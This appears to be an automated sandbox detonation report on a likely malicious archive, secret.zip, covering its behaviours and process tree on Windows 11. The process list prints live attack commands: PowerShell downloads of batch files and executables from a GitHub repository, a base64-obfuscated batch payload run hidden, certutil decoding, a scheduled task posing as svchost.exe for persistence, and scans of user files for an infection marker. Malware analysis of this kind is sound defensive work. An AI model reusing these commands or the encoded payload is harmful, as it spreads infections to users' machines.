Analysis Overview
SHA256
f41e468b671f59a1cdaf868e4dc91106e341bdce5cad41d01c151d0e7ebcd9d1
Threat Level: Likely malicious
The file secret.zip was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Drops startup file
Deobfuscate/Decode Files or Information
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Windows directory
Browser Information Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Enumerates system info in registry
Modifies registry class
Views/modifies file attributes
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-05-15 08:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-15 08:29
Reported
2025-05-15 08:35
Platform
win11-20250502-en
Max time kernel
324s
Max time network
330s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regstartup32.bat | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft-Edge\Rar.exe | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\certutil.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\balls.bat | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330179853-1108322181-418488014-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ANCVirus.png" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\findstr.exe | N/A |
| N/A | N/A | C:\Windows\system32\findstr.exe | N/A |
| N/A | N/A | C:\Windows\system32\findstr.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133917717166453887" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-330179853-1108322181-418488014-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-330179853-1108322181-418488014-1000\{48A23430-6D71-4A0F-9358-81C0CFDFB29D} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-330179853-1108322181-418488014-1000\{977BB5F3-E485-4AB6-927C-1A2E4E3A0765} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\secret.zip
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_secret.zip\rembotperm.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_secret.zip\rembotperm.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /SC ONLOGON /RL HIGHEST /TN EmbeddedAppTask /TR C:\Users\Admin\AppData\Local\Temp\svchost.exe /F
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Windows\system32\cmd.exe
cmd /C "Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat \" -OutFile \"balls.bat\""
C:\Windows\system32\cmd.exe
cmd /C "powershell Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat\" -OutFile \"balls.bat\""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat\" -OutFile \"balls.bat\"
C:\Windows\system32\cmd.exe
cmd /C balls.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$Base64 = '//4mY2xzDQpAJXBVQmxJYzp+ODksODMlJVBVQkxpYzp+NSwxJUNIb14gb2ZeJVB1QmxJQzp+NDYsMTYlZg0KU0V0IFJePUpnXiVwVUJMSWM6fjEzLDElXmd0R1h6JXBVQkxJYzp+NCwxJXclcFVCTEljOn4xMSwxJV5obSVwVUJMSWM6fjEwLDElXlNeSEleT15BDQpeJXBVQmxJQzp+MTQsMSVeTCVwVUJsaUM6fjU1LDE3JV4lcHVibEljOn40LDElDQpAXmVeYyVyOn4xNSwxJV4lcjp+MTcsMSUgXiVyOn4xNywxJW4NCkBlYyVyOn4xMSwxJW8gb2ZmDQoNCiVyOn44LDElZSVyOn40LDElICJkJXI6fjIsMSVyPUM6XFUlcjp+OCwxJWVyJXI6fjgsMSVcJXVzZXJuYW1lJVxNJXI6fjIsMSVjcm8lcjp+OCwxJW9mJXI6fjQsMSUtRWQlcjp+MSwxJWUiDQoNCiVyOn4yLDElZiBubyVyOn40LDElIGV4JXI6fjIsMSUlcjp+OCwxJSVyOn40LDElICIlZGlyJSIgKA0KICAgICVyOn4xMiwxJWtkJXI6fjIsMSVyICIlZGlyJSINCiAgICBhJXI6fjQsMSUlcjp+NCwxJXIlcjp+MiwxJSVyOn4xMCwxJSArJXI6fjExLDElICIlZGlyJSINCiAgICBjb3B5ICIlfjAiICIlZGlyJVwlcjp+MTMsMSVwZGElcjp+NCwxJWVyLiVyOn4xMCwxJWElcjp+NCwxJSINCiAgICBwbyVyOn45LDElZXIlcjp+OCwxJSVyOn4xMSwxJWVsbCAtQ28lcjp+MTIsMSUlcjp+MTIsMSVhbmQgIiVyOn4xNCwxJSVyOn40LDElYXIlcjp+NCwxJS1Qcm9jZSVyOn44LDElJXI6fjgsMSUgJyIlZGlyJVwlcjp+MTMsMSVwZGElcjp+NCwxJWVyLiVyOn4xMCwxJWElcjp+NCwxJSInIC1XJXI6fjIsMSVuZG8lcjp+OSwxJSVyOn4xNCwxJSVyOn40LDEleWxlICVyOn4xNSwxJSVyOn4yLDElZGRlbiINCiAgICBkZWwgIiV+MCINCiAgICBleCVyOn4yLDElJXI6fjQsMSUNCikNCg0KcmQgLyVyOn44LDElIC9xICIldGVtcCVcNDMxNV80MDYyMTMxNDAiDQoNCnBvJXI6fjksMSVlciVyOn44LDElJXI6fjExLDElZWxsIC1DbyVyOn4xMiwxJSVyOn4xMiwxJWFuZCAiJiB7JXI6fjE2LDElbnZva2UtV2Ulcjp+MTAsMSVSZXElcjp+MTMsMSVlJXI6fjgsMSUlcjp+NCwxJSAtVXIlcjp+MiwxJSAnJXI6fjExLDElJXI6fjQsMSUlcjp+NCwxJXAlcjp+OCwxJTovLyVyOn4xLDElJXI6fjIsMSUlcjp+NCwxJSVyOn4xMSwxJSVyOn4xMywxJSVyOn4xMCwxJS5jbyVyOn4xMiwxJS9WJXI6fjIsMSUlcjp+OCwxJW8lcjp+NiwxJUMvTSVyOn4yLDElJXI6fjgsMSUlcjp+NCwxJWVyQm8lcjp+MTIsMSUlcjp+MTAsMSVhJXI6fjgsMSUlcjp+NCwxJSVyOn4yLDElYy9yYSVyOn45LDElLyVyOn4xMiwxJWElcjp+MiwxJW4vZG9uL1Jhci5leGUnIC0lcjp+MTcsMSUlcjp+MTMsMSUlcjp+NCwxJUYlcjp+MiwxJWxlICciJWRpciVcUmFyLmV4ZSInfSIgMj4mMSA+biVyOn4xMywxJWwNCnBvJXI6fjksMSVlciVyOn44LDElJXI6fjExLDElZWxsIC1DbyVyOn4xMiwxJSVyOn4xMiwxJWFuZCAiJXI6fjE2LDElbnZva2UtV2Ulcjp+MTAsMSVSZXElcjp+MTMsMSVlJXI6fjgsMSUlcjp+NCwxJSAtVXIlcjp+MiwxJSAnJXI6fjExLDElJXI6fjQsMSUlcjp+NCwxJXAlcjp+OCwxJTovLyVyOn4xLDElJXI6fjIsMSUlcjp+NCwxJSVyOn4xMSwxJSVyOn4xMywxJSVyOn4xMCwxJS5jbyVyOn4xMiwxJS9WJXI6fjIsMSUlcjp+OCwxJW8lcjp+NiwxJUMvTSVyOn4yLDElJXI6fjgsMSUlcjp+NCwxJWVyQm8lcjp+MTIsMSUlcjp+MTAsMSVhJXI6fjgsMSUlcjp+NCwxJSVyOn4yLDElYy9yYSVyOn45LDElL3JlZiVyOn44LDElLyVyOn4xMSwxJWVhZCVyOn44LDElLyVyOn4xMiwxJWElcjp+MiwxJW4vZG9uLyVyOn4xOCwxJU5DViVyOn4yLDElciVyOn4xMywxJSVyOn44LDElLnJhcicgLSVyOn4xNywxJSVyOn4xMywxJSVyOn40LDElRiVyOn4yLDElbGUgJyIlZGlyJVwlcjp+NCwxJSVyOn4xMiwxJXAucmFyIiciID5uJXI6fjEzLDElbA0KDQoiJWRpciVcUmFyIiB4IC1wJXI6fjE4LDElTkNvblQlcjp+MTcsMSVQICIlZGlyJVwlcjp+NCwxJSVyOn4xMiwxJXAucmFyIiAiJWRpciUiDQpjb3B5ICIlfjAiICIldGVtcCVcMTQyNjQ1NDc4MTM3MjIxNDgxODM1MTU3MjIyMTE5MzI4OTMiDQpjYWxsICIlZGlyJVwlcjp+MTIsMSVhJXI6fjIsMSVuLiVyOn4xMCwxJWElcjp+NCwxJSINCg0KciVyOn4xMiwxJWQlcjp+MiwxJXIgLyVyOn44LDElIC9xICIlZGlyJSINCmRlbCAiJX4wIg0KZXglcjp+MiwxJSVyOn40LDElDQpAZWMlcjp+MTEsMSVvIG9mZg0KJXI6fjgsMSVlJXI6fjQsMSUgYSA9ICUlfmkNCiVyOn44LDElZSVyOn40LDElIGEgPSAlICsgJX5pIiUlfiVyOn4yLDElIiUNCnNldCBhID0gJWElDQo6YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFiDQo='; $TempFile = [System.IO.Path]::Combine($env:TEMP, (Get-Random).ToString() + '.bat'); [System.IO.File]::WriteAllBytes($TempFile, [System.Convert]::FromBase64String($Base64)); Start-Process -WindowStyle Hidden -FilePath $TempFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1945869879.bat" "
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\Microsoft-Edge"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process '"C:\Users\Admin\Microsoft-Edge\updater.bat"' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Microsoft-Edge\updater.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& {Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/main/don/Rar.exe' -OutFile '"C:\Users\Admin\Microsoft-Edge\Rar.exe"'}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/ANCVirus.rar' -OutFile '"C:\Users\Admin\Microsoft-Edge\tmp.rar"'"
C:\Users\Admin\Microsoft-Edge\Rar.exe
"C:\Users\Admin\Microsoft-Edge\Rar" x -pANConTOP "C:\Users\Admin\Microsoft-Edge\tmp.rar" "C:\Users\Admin\Microsoft-Edge"
C:\Windows\system32\certutil.exe
certutil -decode "C:\Users\Admin\AppData\Local\Temp\15623_3106930297.tmp" "C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd" "
C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\ANC"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Start-Process '"C:\Users\Admin\ANC\payload.bat"' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\ANC\payload.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process '"C:\Users\Admin\ANC\payload.bat"' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\ANC\payload.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://i.imgur.com/4A1D39J.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ANCVirus.png' -ErrorAction SilentlyContinue"
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ANCVirus.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "10" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters 1, True
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\AssertSplit.jpeg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\BlockExport.mp4"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ClearLimit.eprtx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ConvertFromPing.potm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\CopyEnter.sql"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ImportExit.temp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\InitializeTest.crw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\Microsoft Edge.lnk"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\PingShow.mpe"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ProtectLimit.jfif"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\PublishGroup.xlsb"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ReceiveWatch.clr"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\RepairWrite.midi"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResetInstall.dotx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResizeClose.rm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResizeUnlock.xps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\RestorePush.au3"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SaveInitialize.au3"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SendUnlock.docx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SkipFind.vdw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SplitImport.docx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\StepGrant.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SubmitStep.MOD"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\TestBlock.zip"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnlockUninstall.wmx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnpublishDismount.txt"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnregisterConfirm.vdw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnregisterStop.jtx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UpdateReceive.ttc"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UpdateRegister.ttf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\WatchDismount.emf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\AssertRequest.vsd"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\BlockSearch.pub"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\CompressSkip.xlsx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ConvertUndo.xltm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyBlock.pot"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyDisable.vsdm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyJoin.pptm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DisableResize.xlsb"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ExportReceive.pub"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\FindProtect.dot"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\GrantImport.xlsm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\HideReceive.htm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MeasureDebug.pptx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MeasurePing.ods"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MergePush.vdx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MountMerge.pptm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MountPop.odp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OutTest.dot"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RedoApprove.pot"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RenameMerge.vstx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RepairWait.ods"
C:\Windows\system32\findstr.exe
